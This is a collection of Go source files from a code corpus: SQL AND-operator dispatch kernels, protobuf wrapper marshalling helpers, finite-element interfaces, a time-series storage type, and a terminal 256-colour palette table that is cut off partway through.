// NullAndConst computes NULL AND scalar by flipping the operands.
func NullAndConst(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
	return ConstAndNull(rv, lv, proc)
}

// NullAndNull computes NULL AND NULL, which is a scalar null.
func NullAndNull(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
	return proc.AllocScalarNullVector(lv.Typ), nil
}
// InitFuncMap populates every operator dispatch table in this package
// (logical and comparison operators); call it once before evaluating any
// expressions.
func InitFuncMap() {
	InitAndFuncMap()
	InitOrFuncMap()
	InitXorFuncMap()
	InitNotFuncMap()
	InitEqFuncMap()
	InitGeFuncMap()
	InitGtFuncMap()
	InitLeFuncMap()
	InitLtFuncMap()
	InitNeFuncMap()
}
// AndFunc is the signature shared by all AND kernel variants.
type AndFunc = func(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error)

// AndFuncMap dispatches on lt*3+rt, where lt/rt are the GetTypeID results
// (0 column, 1 scalar, 2 scalar-null) of the left/right operands.
var AndFuncMap = map[int]AndFunc{}

// AndFuncVec lists the kernels in dispatch order: row = left operand kind,
// column = right operand kind.
var AndFuncVec = []AndFunc{
	ColAndCol, ColAndConst, ColAndNull,
	ConstAndCol, ConstAndConst, ConstAndNull,
	NullAndCol, NullAndConst, NullAndNull,
}

// InitAndFuncMap copies AndFuncVec into AndFuncMap.
func InitAndFuncMap() {
	for i := 0; i < len(AndFuncVec); i++ {
		AndFuncMap[i] = AndFuncVec[i]
	}
}
// GetTypeID classifies a vector for kernel dispatch:
// 0 = column, 1 = non-null scalar, 2 = scalar null.
func GetTypeID(vs *vector.Vector) int {
	switch {
	case !vs.IsScalar():
		return 0
	case vs.IsScalarNull():
		return 2
	default:
		return 1
	}
}
func And(vectors []*vector.Vector, proc *process.Process) (*vector.Vector, error) {
lv := vectors[0]
rv := vectors[1]
lt, rt := GetTypeID(lv), GetTypeID(rv)
vec, err := AndFuncMap[lt*3+rt](lv, rv, proc)
if err != nil {
return nil, err
}
return vec, nil
} | pkg/sql/plan2/function/operator/and.go | 0.52829 | 0.44071 | and.go | starcoder |
package types
// The helpers below follow the generated gogo/protobuf "wrappers" pattern:
// for each well-known wrapper message type there are five functions that
// operate on the bare Go value (populate for tests, size, marshal,
// marshal-to, and unmarshal), each delegating to the wrapper message.

// NewPopulatedStdDouble returns a pointer to a randomly populated float64.
func NewPopulatedStdDouble(r randyWrappers, easy bool) *float64 {
	v := NewPopulatedDoubleValue(r, easy)
	return &v.Value
}

// SizeOfStdDouble reports the encoded size of v wrapped as a DoubleValue.
func SizeOfStdDouble(v float64) int {
	pv := &DoubleValue{Value: v}
	return pv.Size()
}

// StdDoubleMarshal encodes v as a DoubleValue message.
func StdDoubleMarshal(v float64) ([]byte, error) {
	size := SizeOfStdDouble(v)
	buf := make([]byte, size)
	_, err := StdDoubleMarshalTo(v, buf)
	return buf, err
}

// StdDoubleMarshalTo encodes v into data, returning the bytes written.
func StdDoubleMarshalTo(v float64, data []byte) (int, error) {
	pv := &DoubleValue{Value: v}
	return pv.MarshalTo(data)
}

// StdDoubleUnmarshal decodes a DoubleValue message from data into *v.
func StdDoubleUnmarshal(v *float64, data []byte) error {
	pv := &DoubleValue{}
	if err := pv.Unmarshal(data); err != nil {
		return err
	}
	*v = pv.Value
	return nil
}

// NewPopulatedStdFloat returns a pointer to a randomly populated float32.
func NewPopulatedStdFloat(r randyWrappers, easy bool) *float32 {
	v := NewPopulatedFloatValue(r, easy)
	return &v.Value
}

// SizeOfStdFloat reports the encoded size of v wrapped as a FloatValue.
func SizeOfStdFloat(v float32) int {
	pv := &FloatValue{Value: v}
	return pv.Size()
}

// StdFloatMarshal encodes v as a FloatValue message.
func StdFloatMarshal(v float32) ([]byte, error) {
	size := SizeOfStdFloat(v)
	buf := make([]byte, size)
	_, err := StdFloatMarshalTo(v, buf)
	return buf, err
}

// StdFloatMarshalTo encodes v into data, returning the bytes written.
func StdFloatMarshalTo(v float32, data []byte) (int, error) {
	pv := &FloatValue{Value: v}
	return pv.MarshalTo(data)
}

// StdFloatUnmarshal decodes a FloatValue message from data into *v.
func StdFloatUnmarshal(v *float32, data []byte) error {
	pv := &FloatValue{}
	if err := pv.Unmarshal(data); err != nil {
		return err
	}
	*v = pv.Value
	return nil
}

// NewPopulatedStdInt64 returns a pointer to a randomly populated int64.
func NewPopulatedStdInt64(r randyWrappers, easy bool) *int64 {
	v := NewPopulatedInt64Value(r, easy)
	return &v.Value
}

// SizeOfStdInt64 reports the encoded size of v wrapped as an Int64Value.
func SizeOfStdInt64(v int64) int {
	pv := &Int64Value{Value: v}
	return pv.Size()
}

// StdInt64Marshal encodes v as an Int64Value message.
func StdInt64Marshal(v int64) ([]byte, error) {
	size := SizeOfStdInt64(v)
	buf := make([]byte, size)
	_, err := StdInt64MarshalTo(v, buf)
	return buf, err
}

// StdInt64MarshalTo encodes v into data, returning the bytes written.
func StdInt64MarshalTo(v int64, data []byte) (int, error) {
	pv := &Int64Value{Value: v}
	return pv.MarshalTo(data)
}

// StdInt64Unmarshal decodes an Int64Value message from data into *v.
func StdInt64Unmarshal(v *int64, data []byte) error {
	pv := &Int64Value{}
	if err := pv.Unmarshal(data); err != nil {
		return err
	}
	*v = pv.Value
	return nil
}

// NewPopulatedStdUInt64 returns a pointer to a randomly populated uint64.
func NewPopulatedStdUInt64(r randyWrappers, easy bool) *uint64 {
	v := NewPopulatedUInt64Value(r, easy)
	return &v.Value
}

// SizeOfStdUInt64 reports the encoded size of v wrapped as a UInt64Value.
func SizeOfStdUInt64(v uint64) int {
	pv := &UInt64Value{Value: v}
	return pv.Size()
}

// StdUInt64Marshal encodes v as a UInt64Value message.
func StdUInt64Marshal(v uint64) ([]byte, error) {
	size := SizeOfStdUInt64(v)
	buf := make([]byte, size)
	_, err := StdUInt64MarshalTo(v, buf)
	return buf, err
}

// StdUInt64MarshalTo encodes v into data, returning the bytes written.
func StdUInt64MarshalTo(v uint64, data []byte) (int, error) {
	pv := &UInt64Value{Value: v}
	return pv.MarshalTo(data)
}

// StdUInt64Unmarshal decodes a UInt64Value message from data into *v.
func StdUInt64Unmarshal(v *uint64, data []byte) error {
	pv := &UInt64Value{}
	if err := pv.Unmarshal(data); err != nil {
		return err
	}
	*v = pv.Value
	return nil
}

// NewPopulatedStdInt32 returns a pointer to a randomly populated int32.
func NewPopulatedStdInt32(r randyWrappers, easy bool) *int32 {
	v := NewPopulatedInt32Value(r, easy)
	return &v.Value
}

// SizeOfStdInt32 reports the encoded size of v wrapped as an Int32Value.
func SizeOfStdInt32(v int32) int {
	pv := &Int32Value{Value: v}
	return pv.Size()
}

// StdInt32Marshal encodes v as an Int32Value message.
func StdInt32Marshal(v int32) ([]byte, error) {
	size := SizeOfStdInt32(v)
	buf := make([]byte, size)
	_, err := StdInt32MarshalTo(v, buf)
	return buf, err
}

// StdInt32MarshalTo encodes v into data, returning the bytes written.
func StdInt32MarshalTo(v int32, data []byte) (int, error) {
	pv := &Int32Value{Value: v}
	return pv.MarshalTo(data)
}

// StdInt32Unmarshal decodes an Int32Value message from data into *v.
func StdInt32Unmarshal(v *int32, data []byte) error {
	pv := &Int32Value{}
	if err := pv.Unmarshal(data); err != nil {
		return err
	}
	*v = pv.Value
	return nil
}

// NewPopulatedStdUInt32 returns a pointer to a randomly populated uint32.
func NewPopulatedStdUInt32(r randyWrappers, easy bool) *uint32 {
	v := NewPopulatedUInt32Value(r, easy)
	return &v.Value
}

// SizeOfStdUInt32 reports the encoded size of v wrapped as a UInt32Value.
func SizeOfStdUInt32(v uint32) int {
	pv := &UInt32Value{Value: v}
	return pv.Size()
}

// StdUInt32Marshal encodes v as a UInt32Value message.
func StdUInt32Marshal(v uint32) ([]byte, error) {
	size := SizeOfStdUInt32(v)
	buf := make([]byte, size)
	_, err := StdUInt32MarshalTo(v, buf)
	return buf, err
}

// StdUInt32MarshalTo encodes v into data, returning the bytes written.
func StdUInt32MarshalTo(v uint32, data []byte) (int, error) {
	pv := &UInt32Value{Value: v}
	return pv.MarshalTo(data)
}

// StdUInt32Unmarshal decodes a UInt32Value message from data into *v.
func StdUInt32Unmarshal(v *uint32, data []byte) error {
	pv := &UInt32Value{}
	if err := pv.Unmarshal(data); err != nil {
		return err
	}
	*v = pv.Value
	return nil
}

// NewPopulatedStdBool returns a pointer to a randomly populated bool.
func NewPopulatedStdBool(r randyWrappers, easy bool) *bool {
	v := NewPopulatedBoolValue(r, easy)
	return &v.Value
}

// SizeOfStdBool reports the encoded size of v wrapped as a BoolValue.
func SizeOfStdBool(v bool) int {
	pv := &BoolValue{Value: v}
	return pv.Size()
}

// StdBoolMarshal encodes v as a BoolValue message.
func StdBoolMarshal(v bool) ([]byte, error) {
	size := SizeOfStdBool(v)
	buf := make([]byte, size)
	_, err := StdBoolMarshalTo(v, buf)
	return buf, err
}

// StdBoolMarshalTo encodes v into data, returning the bytes written.
func StdBoolMarshalTo(v bool, data []byte) (int, error) {
	pv := &BoolValue{Value: v}
	return pv.MarshalTo(data)
}

// StdBoolUnmarshal decodes a BoolValue message from data into *v.
func StdBoolUnmarshal(v *bool, data []byte) error {
	pv := &BoolValue{}
	if err := pv.Unmarshal(data); err != nil {
		return err
	}
	*v = pv.Value
	return nil
}

// NewPopulatedStdString returns a pointer to a randomly populated string.
func NewPopulatedStdString(r randyWrappers, easy bool) *string {
	v := NewPopulatedStringValue(r, easy)
	return &v.Value
}

// SizeOfStdString reports the encoded size of v wrapped as a StringValue.
func SizeOfStdString(v string) int {
	pv := &StringValue{Value: v}
	return pv.Size()
}

// StdStringMarshal encodes v as a StringValue message.
func StdStringMarshal(v string) ([]byte, error) {
	size := SizeOfStdString(v)
	buf := make([]byte, size)
	_, err := StdStringMarshalTo(v, buf)
	return buf, err
}

// StdStringMarshalTo encodes v into data, returning the bytes written.
func StdStringMarshalTo(v string, data []byte) (int, error) {
	pv := &StringValue{Value: v}
	return pv.MarshalTo(data)
}

// StdStringUnmarshal decodes a StringValue message from data into *v.
func StdStringUnmarshal(v *string, data []byte) error {
	pv := &StringValue{}
	if err := pv.Unmarshal(data); err != nil {
		return err
	}
	*v = pv.Value
	return nil
}

// NewPopulatedStdBytes returns a pointer to a randomly populated []byte.
func NewPopulatedStdBytes(r randyWrappers, easy bool) *[]byte {
	v := NewPopulatedBytesValue(r, easy)
	return &v.Value
}

// SizeOfStdBytes reports the encoded size of v wrapped as a BytesValue.
func SizeOfStdBytes(v []byte) int {
	pv := &BytesValue{Value: v}
	return pv.Size()
}

// StdBytesMarshal encodes v as a BytesValue message.
func StdBytesMarshal(v []byte) ([]byte, error) {
	size := SizeOfStdBytes(v)
	buf := make([]byte, size)
	_, err := StdBytesMarshalTo(v, buf)
	return buf, err
}

// StdBytesMarshalTo encodes v into data, returning the bytes written.
func StdBytesMarshalTo(v []byte, data []byte) (int, error) {
	pv := &BytesValue{Value: v}
	return pv.MarshalTo(data)
}

// StdBytesUnmarshal decodes a BytesValue message from data into *v.
func StdBytesUnmarshal(v *[]byte, data []byte) error {
	pv := &BytesValue{}
	if err := pv.Unmarshal(data); err != nil {
		return err
	}
	*v = pv.Value
	return nil
}
package fem
import (
"github.com/cpmech/gofem/inp"
"github.com/cpmech/gosl/fun"
"github.com/cpmech/gosl/la"
)
// OutIpData is an auxiliary structure to transfer data from integration points (IP) to output routines.
type OutIpData struct {
	Eid int                 // id of element that owns this ip
	X   []float64           // real coordinates of the integration point
	V   map[string]*float64 // maps label (e.g. "sx") to pointer to value
}
// Elem defines what elements must calculate. Methods return ok == false on
// failure (errors are reported through the package's logging helpers).
type Elem interface {

	// information and initialisation
	Id() int                                           // returns the cell Id
	SetEqs(eqs [][]int, mixedform_eqs []int) (ok bool) // set equations

	// conditions (natural BCs and element's)
	SetEleConds(key string, f fun.Func, extra string) (ok bool) // set element conditions

	// called for each time step
	InterpStarVars(sol *Solution) (ok bool) // interpolate star variables to integration points

	// called for each iteration
	AddToRhs(fb []float64, sol *Solution) (ok bool)                // adds -R to global residual vector fb
	AddToKb(Kb *la.Triplet, sol *Solution, firstIt bool) (ok bool) // adds element K to global Jacobian matrix Kb
	Update(sol *Solution) (ok bool)                                // perform (tangent) update

	// reading and writing of element data
	Encode(enc Encoder) (ok bool) // encodes internal variables
	Decode(dec Decoder) (ok bool) // decodes internal variables

	// output
	OutIpsData() (data []*OutIpData) // returns data from all integration points for output
}
// ElemConnector defines connector elements; elements that depend upon others
type ElemConnector interface {
	Id() int                                                   // returns the cell Id
	Connect(cid2elem []Elem, c *inp.Cell) (nnzK int, ok bool)  // connect multiple elements; e.g.: connect rod/solid elements in Rjoints
}
// ElemIntvars defines elements with {z,q} internal variables that can be
// initialised, backed up, and restored during the solution process.
type ElemIntvars interface {
	Ipoints() (coords [][]float64) // returns the real coordinates of integration points [nip][ndim]
	SetIniIvs(sol *Solution, ivs map[string][]float64) (ok bool) // sets initial internal values from sol and the ivs map (label => values per ip)
	BackupIvs() (ok bool) // create copy of internal variables
	RestoreIvs() (ok bool) // restore internal variables from copies
	Ureset(sol *Solution) (ok bool) // fixes internal variables after u (displacements) have been zeroed
}
// Info holds all information required to set a simulation stage
type Info struct {
	// essential
	Dofs [][]string // solution variables PER NODE. ex for 2 nodes: [["ux", "uy", "rz"], ["ux", "uy", "rz"]]
	Y2F map[string]string // maps "y" (solution) keys to "f" (force) keys. ex: "ux" => "fx", "pl" => "ql"
	// internal Dofs; e.g. for mixed formulations
	NintDofs int // number of internal dofs (not attached to nodes)
	// t1 and t2 variables (time-derivatives of first and second order)
	T1vars []string // variables with first-order time derivatives; e.g. "pl"
	T2vars []string // variables with second-order time derivatives; e.g. "ux", "uy"
}
// GetElemInfo returns information about elements/formulations.
// cellType -- e.g. "qua8"
// elemType -- e.g. "u"
// Returns nil (after logging) when the element type is unknown or no info
// can be produced for the given cell type.
func GetElemInfo(cellType, elemType string, faceConds []*FaceCond) *Info {
	getter, found := infogetters[elemType]
	if LogErrCond(!found, "cannot find element type = %s", elemType) {
		return nil
	}
	res := getter(cellType, faceConds)
	if LogErrCond(res == nil, "cannot find info from %q element", elemType) {
		return nil
	}
	return res
}
// NewElem returns a new element from its type; e.g. "p", "u" or "up".
// Returns nil (after logging) when the element type is unknown or the
// allocator fails to build the element.
func NewElem(edat *inp.ElemData, cid int, msh *inp.Mesh, faceConds []*FaceCond) Elem {
	etype := edat.Type
	alloc, found := eallocators[etype]
	if LogErrCond(!found, "cannot find element type = %s", etype) {
		return nil
	}
	cell := msh.Cells[cid]
	coords := BuildCoordsMatrix(cell, msh)
	elem := alloc(cell.Type, faceConds, cid, edat, coords)
	if LogErrCond(elem == nil, "cannot allocate %q element", etype) {
		return nil
	}
	return elem
}
// BuildCoordsMatrix returns the coordinate matrix of a particular Cell,
// with x[i][j] holding dimension i of the cell's j-th vertex.
func BuildCoordsMatrix(c *inp.Cell, msh *inp.Mesh) (x [][]float64) {
	x = la.MatAlloc(msh.Ndim, len(c.Verts))
	for j, v := range c.Verts {
		vert := msh.Verts[v]
		for i := 0; i < msh.Ndim; i++ {
			x[i][j] = vert.C[i]
		}
	}
	return
}
// infogetters holds all available formulations/info; maps elemType (e.g. "u") to its info-getter function
var infogetters = make(map[string]func(cellType string, faceConds []*FaceCond) *Info)
// eallocators holds all available elements; maps elemType to its element allocator function
var eallocators = make(map[string]func(cellType string, faceConds []*FaceCond, cid int, edat *inp.ElemData, x [][]float64) Elem) | fem/element.go | 0.579519 | 0.404684 | element.go | starcoder |
package storage
import (
"math"
"time"
"github.com/m3db/m3x/close"
)
// A Series is a series of datapoints, bucketed into fixed time intervals
type Series interface {
	xclose.Closer // Close releases any pooled resources backing the series
	Len() int // Len returns the number of datapoints in the series
	StepSize() time.Duration // StepSize is the size of each "step" in the series
	StartTime() time.Time // StartTime is the start time for the series
	EndTime() time.Time // EndTime is the end time for the series (exclusive; StartTime + Len*StepSize)
	ValueAt(n int) float64 // ValueAt returns the value at the given step
	StartTimeAt(n int) time.Time // StartTimeAt returns the start time for the given step
}
// series is the concrete Series implementation; it pairs a SeriesValues
// container with the timing information needed to locate each step.
type series struct {
	values SeriesValues // the datapoints, one per step
	stepSize time.Duration // duration covered by each step
	startTime time.Time // start time of the first step
	vp SeriesValuesPool // pool to release values into on Close; may be nil
}
// Len returns the number of datapoints in the series.
func (s series) Len() int {
	return s.values.Len()
}

// StepSize returns the fixed duration covered by each step.
func (s series) StepSize() time.Duration {
	return s.stepSize
}

// StartTime returns the start time of the first step.
func (s series) StartTime() time.Time {
	return s.startTime
}

// EndTime returns the (exclusive) end time: start plus Len steps.
func (s series) EndTime() time.Time {
	total := time.Duration(s.Len()) * s.stepSize
	return s.startTime.Add(total)
}

// ValueAt returns the value stored at step n.
func (s series) ValueAt(n int) float64 {
	return s.values.ValueAt(n)
}

// StartTimeAt returns the start time of step n.
func (s series) StartTimeAt(n int) time.Time {
	return s.startTime.Add(time.Duration(n) * s.stepSize)
}

// Close releases the underlying values back to the pool, if one was provided.
func (s series) Close() error {
	if s.vp == nil {
		return nil
	}
	s.vp.Release(s.values)
	return nil
}
// NewSeries returns a new series wrapped around a set of values.
// pool may be nil, in which case Close is a no-op.
func NewSeries(start time.Time, step time.Duration, vals SeriesValues, pool SeriesValuesPool) Series {
	s := series{
		values:    vals,
		stepSize:  step,
		startTime: start,
		vp:        pool,
	}
	return s
}
// SeriesValues hold the underlying values in a series. Values can often be large, and
// benefit from direct pooling (see SeriesValuesPool).
type SeriesValues interface {
	Len() int // the number of values in the series
	SetValueAt(n int, v float64) // sets the value at the given location
	ValueAt(n int) float64 // returns the value at the given location
}
// Float64SeriesValues is a SeriesValues implementation backed by a plain
// float64 slice.
type Float64SeriesValues []float64

// Len returns the number of values in the series.
func (s Float64SeriesValues) Len() int {
	return len(s)
}

// SetValueAt stores v at position n.
func (s Float64SeriesValues) SetValueAt(n int, v float64) {
	s[n] = v
}

// ValueAt returns the value held at position n.
func (s Float64SeriesValues) ValueAt(n int) float64 {
	return s[n]
}

// Reset overwrites every slot with NaN.
func (s Float64SeriesValues) Reset() {
	for i := 0; i < len(s); i++ {
		s[i] = math.NaN()
	}
}
// A SeriesValuesPool allows for pooling of the underlying SeriesValues, which
// are typically large and benefit from being held in some form of pool
type SeriesValuesPool interface {
	// New creates or reserves series values of the specified length
	New(len int) SeriesValues
	// Release releases previously allocated values back to the pool
	Release(v SeriesValues)
} | series.go | 0.850562 | 0.572125 | series.go | starcoder |
package termios
// coldef256 maps the package's 256-color palette variables to their RGB definitions.
var coldef256 = make(coldef)
// init fills coldef256 with the RGB value of every 256-color palette entry.
func init() {
	// The 16 basic system colors (palette indices 0-15).
	coldef256[&Color256Black] = RGB{0, 0, 0}
	coldef256[&Color256Maroon] = RGB{128, 0, 0}
	coldef256[&Color256Green] = RGB{0, 128, 0}
	coldef256[&Color256Olive] = RGB{128, 128, 0}
	coldef256[&Color256Navy] = RGB{0, 0, 128}
	coldef256[&Color256Purple] = RGB{128, 0, 128}
	coldef256[&Color256Teal] = RGB{0, 128, 128}
	coldef256[&Color256Silver] = RGB{192, 192, 192}
	coldef256[&Color256Grey] = RGB{128, 128, 128}
	coldef256[&Color256Red] = RGB{255, 0, 0}
	coldef256[&Color256Lime] = RGB{0, 255, 0}
	coldef256[&Color256Yellow] = RGB{255, 255, 0}
	coldef256[&Color256Blue] = RGB{0, 0, 255}
	coldef256[&Color256Fuchsia] = RGB{255, 0, 255}
	coldef256[&Color256Aqua] = RGB{0, 255, 255}
	coldef256[&Color256White] = RGB{255, 255, 255}
	// The 6x6x6 color cube (palette indices 16-231); each channel takes one
	// of the levels 0, 95, 135, 175, 215, 255.
	coldef256[&Color256Grey0] = RGB{0, 0, 0}
	coldef256[&Color256NavyBlue] = RGB{0, 0, 95}
	coldef256[&Color256DarkBlue] = RGB{0, 0, 135}
	coldef256[&Color256Blue3Dark] = RGB{0, 0, 175}
	coldef256[&Color256Blue3Light] = RGB{0, 0, 215}
	coldef256[&Color256Blue1] = RGB{0, 0, 255}
	coldef256[&Color256DarkGreen] = RGB{0, 95, 0}
	coldef256[&Color256DeepSkyBlue4Dark] = RGB{0, 95, 95}
	coldef256[&Color256DeepSkyBlue4Medium] = RGB{0, 95, 135}
	coldef256[&Color256DeepSkyBlue4Light] = RGB{0, 95, 175}
	coldef256[&Color256DodgerBlue3] = RGB{0, 95, 215}
	coldef256[&Color256DodgerBlue2] = RGB{0, 95, 255}
	coldef256[&Color256Green4] = RGB{0, 135, 0}
	coldef256[&Color256SpringGreen4] = RGB{0, 135, 95}
	coldef256[&Color256Turquoise4] = RGB{0, 135, 135}
	coldef256[&Color256DeepSkyBlue3Dark] = RGB{0, 135, 175}
	coldef256[&Color256DeepSkyBlue3Light] = RGB{0, 135, 215}
	coldef256[&Color256DodgerBlue1] = RGB{0, 135, 255}
	coldef256[&Color256Green3Dark] = RGB{0, 175, 0}
	coldef256[&Color256SpringGreen3Dark] = RGB{0, 175, 95}
	coldef256[&Color256DarkCyan] = RGB{0, 175, 135}
	coldef256[&Color256LightSeaGreen] = RGB{0, 175, 175}
	coldef256[&Color256DeepSkyBlue2] = RGB{0, 175, 215}
	coldef256[&Color256DeepSkyBlue1] = RGB{0, 175, 255}
	coldef256[&Color256Green3Light] = RGB{0, 215, 0}
	coldef256[&Color256SpringGreen3Light] = RGB{0, 215, 95}
	coldef256[&Color256SpringGreen2Dark] = RGB{0, 215, 135}
	coldef256[&Color256Cyan3] = RGB{0, 215, 175}
	coldef256[&Color256DarkTurquoise] = RGB{0, 215, 215}
	coldef256[&Color256Turquoise2] = RGB{0, 215, 255}
	coldef256[&Color256Green1] = RGB{0, 255, 0}
	coldef256[&Color256SpringGreen2Light] = RGB{0, 255, 95}
	coldef256[&Color256SpringGreen1] = RGB{0, 255, 135}
	coldef256[&Color256MediumSpringGreen] = RGB{0, 255, 175}
	coldef256[&Color256Cyan2] = RGB{0, 255, 215}
	coldef256[&Color256Cyan1] = RGB{0, 255, 255}
	coldef256[&Color256DarkRedDark] = RGB{95, 0, 0}
	coldef256[&Color256DeepPink4Dark] = RGB{95, 0, 95}
	coldef256[&Color256Purple4Dark] = RGB{95, 0, 135}
	coldef256[&Color256Purple4Light] = RGB{95, 0, 175}
	coldef256[&Color256Purple3] = RGB{95, 0, 215}
	coldef256[&Color256BlueViolet] = RGB{95, 0, 255}
	coldef256[&Color256Orange4Dark] = RGB{95, 95, 0}
	coldef256[&Color256Grey37] = RGB{95, 95, 95}
	coldef256[&Color256MediumPurple4] = RGB{95, 95, 135}
	coldef256[&Color256SlateBlue3Dark] = RGB{95, 95, 175}
	coldef256[&Color256SlateBlue3Light] = RGB{95, 95, 215}
	coldef256[&Color256RoyalBlue1] = RGB{95, 95, 255}
	coldef256[&Color256Chartreuse4] = RGB{95, 135, 0}
	coldef256[&Color256DarkSeaGreen4Light] = RGB{95, 135, 95}
	coldef256[&Color256PaleTurquoise4] = RGB{95, 135, 135}
	coldef256[&Color256SteelBlue] = RGB{95, 135, 175}
	coldef256[&Color256SteelBlue3] = RGB{95, 135, 215}
	coldef256[&Color256CornflowerBlue] = RGB{95, 135, 255}
	coldef256[&Color256Chartreuse3Dark] = RGB{95, 175, 0}
	// NOTE(review): &Color256DarkSeaGreen4Light was already assigned above as (95, 135, 95); this entry overwrites it — the two palette colors likely need distinct variables (Dark/Light).
	coldef256[&Color256DarkSeaGreen4Light] = RGB{95, 175, 95}
	coldef256[&Color256CadetBlueDark] = RGB{95, 175, 135}
	coldef256[&Color256CadetBlueLight] = RGB{95, 175, 175}
	coldef256[&Color256SkyBlue3] = RGB{95, 175, 215}
	coldef256[&Color256SteelBlue1Dark] = RGB{95, 175, 255}
	coldef256[&Color256Chartreuse3Light] = RGB{95, 215, 0}
	coldef256[&Color256PaleGreen3Dark] = RGB{95, 215, 95}
	coldef256[&Color256SeaGreen3] = RGB{95, 215, 135}
	coldef256[&Color256Aquamarine3] = RGB{95, 215, 175}
	coldef256[&Color256MediumTurquoise] = RGB{95, 215, 215}
	coldef256[&Color256SteelBlue1Light] = RGB{95, 215, 255}
	coldef256[&Color256Chartreuse2Dark] = RGB{95, 255, 0}
	coldef256[&Color256SeaGreen2] = RGB{95, 255, 95}
	coldef256[&Color256SeaGreen1Dark] = RGB{95, 255, 135}
	coldef256[&Color256SeaGreen1Light] = RGB{95, 255, 175}
	coldef256[&Color256Aquamarine1Dark] = RGB{95, 255, 215}
	coldef256[&Color256DarkSlateGray2] = RGB{95, 255, 255}
	coldef256[&Color256DarkRedLight] = RGB{135, 0, 0}
	coldef256[&Color256DeepPink4Medium] = RGB{135, 0, 95}
	coldef256[&Color256DarkMagentaDark] = RGB{135, 0, 135}
	coldef256[&Color256DarkMagentaLight] = RGB{135, 0, 175}
	coldef256[&Color256DarkVioletDark] = RGB{135, 0, 215}
	// NOTE(review): &Color256Purple was already assigned in the system-color section as (128, 0, 128); this entry overwrites it.
	coldef256[&Color256Purple] = RGB{135, 0, 255}
	coldef256[&Color256Orange4Light] = RGB{135, 95, 0}
	coldef256[&Color256LightPink4] = RGB{135, 95, 95}
	coldef256[&Color256Plum4] = RGB{135, 95, 135}
	coldef256[&Color256MediumPurple3Dark] = RGB{135, 95, 175}
	coldef256[&Color256MediumPurple3Light] = RGB{135, 95, 215}
	coldef256[&Color256SlateBlue1] = RGB{135, 95, 255}
	coldef256[&Color256Yellow4Dark] = RGB{135, 135, 0}
	coldef256[&Color256Wheat4] = RGB{135, 135, 95}
	coldef256[&Color256Grey53] = RGB{135, 135, 135}
	coldef256[&Color256LightSlateGrey] = RGB{135, 135, 175}
	coldef256[&Color256MediumPurpleDark] = RGB{135, 135, 215}
	coldef256[&Color256LightSlateBlue] = RGB{135, 135, 255}
	coldef256[&Color256Yellow4Light] = RGB{135, 175, 0}
	coldef256[&Color256DarkOliveGreen3] = RGB{135, 175, 95}
	coldef256[&Color256DarkSeaGreen] = RGB{135, 175, 135}
	coldef256[&Color256LightSkyBlue3Dark] = RGB{135, 175, 175}
	coldef256[&Color256LightSkyBlue3Light] = RGB{135, 175, 215}
	coldef256[&Color256SkyBlue2] = RGB{135, 175, 255}
	coldef256[&Color256Chartreuse2Light] = RGB{135, 215, 0}
	// NOTE(review): &Color256DarkOliveGreen3 was already assigned above as (135, 175, 95); this entry overwrites it (and is overwritten again below).
	coldef256[&Color256DarkOliveGreen3] = RGB{135, 215, 95}
	coldef256[&Color256PaleGreen3Light] = RGB{135, 215, 135}
	coldef256[&Color256DarkSeaGreen3Dark] = RGB{135, 215, 175}
	coldef256[&Color256DarkSlateGray3] = RGB{135, 215, 215}
	coldef256[&Color256SkyBlue1] = RGB{135, 215, 255}
	coldef256[&Color256Chartreuse1] = RGB{135, 255, 0}
	coldef256[&Color256LightGreenDark] = RGB{135, 255, 95}
	coldef256[&Color256LightGreenLight] = RGB{135, 255, 135}
	coldef256[&Color256PaleGreen1Dark] = RGB{135, 255, 175}
	coldef256[&Color256Aquamarine1Light] = RGB{135, 255, 215}
	coldef256[&Color256DarkSlateGray1] = RGB{135, 255, 255}
	coldef256[&Color256Red3Dark] = RGB{175, 0, 0}
	coldef256[&Color256DeepPink4Light] = RGB{175, 0, 95}
	coldef256[&Color256MediumVioletRed] = RGB{175, 0, 135}
	coldef256[&Color256Magenta3] = RGB{175, 0, 175}
	coldef256[&Color256DarkVioletLight] = RGB{175, 0, 215}
	// NOTE(review): third assignment to &Color256Purple; only this last value survives in the map.
	coldef256[&Color256Purple] = RGB{175, 0, 255}
	coldef256[&Color256DarkOrange3Dark] = RGB{175, 95, 0}
	coldef256[&Color256IndianRedDark] = RGB{175, 95, 95}
	coldef256[&Color256HotPink3Dark] = RGB{175, 95, 135}
	coldef256[&Color256MediumOrchid3] = RGB{175, 95, 175}
	coldef256[&Color256MediumOrchid] = RGB{175, 95, 215}
	coldef256[&Color256MediumPurple2Dark] = RGB{175, 95, 255}
	coldef256[&Color256DarkGoldenrod] = RGB{175, 135, 0}
	coldef256[&Color256LightSalmon3Dark] = RGB{175, 135, 95}
	coldef256[&Color256RosyBrown] = RGB{175, 135, 135}
	coldef256[&Color256Grey63] = RGB{175, 135, 175}
	coldef256[&Color256MediumPurple2Light] = RGB{175, 135, 215}
	coldef256[&Color256MediumPurple1] = RGB{175, 135, 255}
	coldef256[&Color256Gold3Dark] = RGB{175, 175, 0}
	coldef256[&Color256DarkKhaki] = RGB{175, 175, 95}
	coldef256[&Color256NavajoWhite3] = RGB{175, 175, 135}
	coldef256[&Color256Grey69] = RGB{175, 175, 175}
	coldef256[&Color256LightSteelBlue3] = RGB{175, 175, 215}
	coldef256[&Color256LightSteelBlue] = RGB{175, 175, 255}
	coldef256[&Color256Yellow3Dark] = RGB{175, 215, 0}
	// NOTE(review): third assignment to &Color256DarkOliveGreen3; only this last value survives in the map.
	coldef256[&Color256DarkOliveGreen3] = RGB{175, 215, 95}
	coldef256[&Color256DarkSeaGreen3Light] = RGB{175, 215, 135}
	coldef256[&Color256DarkSeaGreen2Dark] = RGB{175, 215, 175}
	coldef256[&Color256LightCyan3] = RGB{175, 215, 215}
	coldef256[&Color256LightSkyBlue1] = RGB{175, 215, 255}
	coldef256[&Color256GreenYellow] = RGB{175, 255, 0}
	coldef256[&Color256DarkOliveGreen2] = RGB{175, 255, 95}
	coldef256[&Color256PaleGreen1Light] = RGB{175, 255, 135}
	coldef256[&Color256DarkSeaGreen2Light] = RGB{175, 255, 175}
	coldef256[&Color256DarkSeaGreen1Dark] = RGB{175, 255, 215}
	coldef256[&Color256PaleTurquoise1] = RGB{175, 255, 255}
	coldef256[&Color256Red3Light] = RGB{215, 0, 0}
	coldef256[&Color256DeepPink3Dark] = RGB{215, 0, 95}
